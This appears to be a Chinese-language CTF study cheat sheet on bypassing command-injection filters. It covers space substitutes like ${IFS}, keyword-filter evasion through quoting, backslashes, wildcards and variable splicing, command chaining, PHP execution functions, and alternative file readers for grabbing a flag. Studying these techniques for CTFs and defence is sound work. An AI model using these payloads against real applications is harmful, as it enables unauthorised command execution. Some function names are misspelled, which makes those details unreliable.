直接闹麻了 ,命令执行绕不过空格的来了🤣,都能执行命令了,空格绕不过去直接全盘皆失
赶紧补充一下自己的命令执行绕过知识😭
空格绕过
\t
%09
${IFS}
$IFS$9
$IFS
%20
{} 例如 :{cat,1.txt}
<或是 << 例如 :cat<flag.txt
关键字过滤绕过
字符串拼接绕过
fl'.'ag
双引号和反引号
fl""ag、fl``ag
通配符
?:一次只能匹配一位
*:一次可以匹配多位
反斜杠绕过
cat fl\ag.p\hps
内联执行绕过
a=c;b=a;c=t;$a$b$c /1.txt
就是前面拼接,后面$调用
拼接命令
分号;:多个命令无论 对错顺序执行
&:作用和分号一样,使用时要先进行url编码为%26才行
&&:前面命令执行不成功 后面无法执行
%26%26
管道输出符号|:前面命令的输出作为后面命令的输入,把前面命令的结果作为后面命令的参数;前面后面的命令都执行,但是只显示后面的命令 执行 结果
||:前面的命令执行成功,则后面的命令不会执行,前面的命令执行失败,则后面的命令执行成功
常见函数
system
exec:示例exec("cat /flag"),其本身没有回显,需要使用>>追加到其他文件
例如:exec("dir >> 2.php");
passthru(读取二进制流):system()的平替,写个命令就会执行命令,自己能 回显
shell_exec和反引号``:格式分别为shell_shell(ls)和 `ls`,不能自己回显,需要借助echo\print登 输出结果
popen:语法为popen(string $command , string $mode),command参数:要执行的命令,mode参数 :模式 r 表示阅读,w 表示写入,不能自己回显,需要print_r等输出内容
proc_popen:语法为proc_open($command , $desckriptor spec , $pipes , $cwd , $env ,vars ,$options)
$command 是要执行的命令 $descriptorspec是一个描述符规范数组,用于指定进程的输入、输出和错误的文件描述符 $pipes是一个引用变量,用于存储与进程相关的管道 $cwd(可选)是设置子进程的当前工作目录 $env(可选)是设置子进程 的环境变量 $other_options(可选)是其他选项,如设置超时等读取命令绕过
tac:反向显示,从最后一行往前显示
more:一页一页显示档案内容
less:与more类似
tail:查看末尾几行
nl:显示的时候,顺便输出行号
od:以二进制 方式读取档案内容
xxd:读取二进制文件
sort:主要用于排序文件
uniq:报告或删除文件中重复的行,当成cat用就行
file -f:报错出具体内容
例如:passthru("file -f /flag");
grep:在文本中查找指定字符串
例如:passtru("grep fla /fla*"); grep fla /fla*命令会匹配根目录下所有以 fla开头的文件,(不包括子目录) 然后将 这些文件中包含字符串fla的行输出到终端上 。strings:相当于cat
)
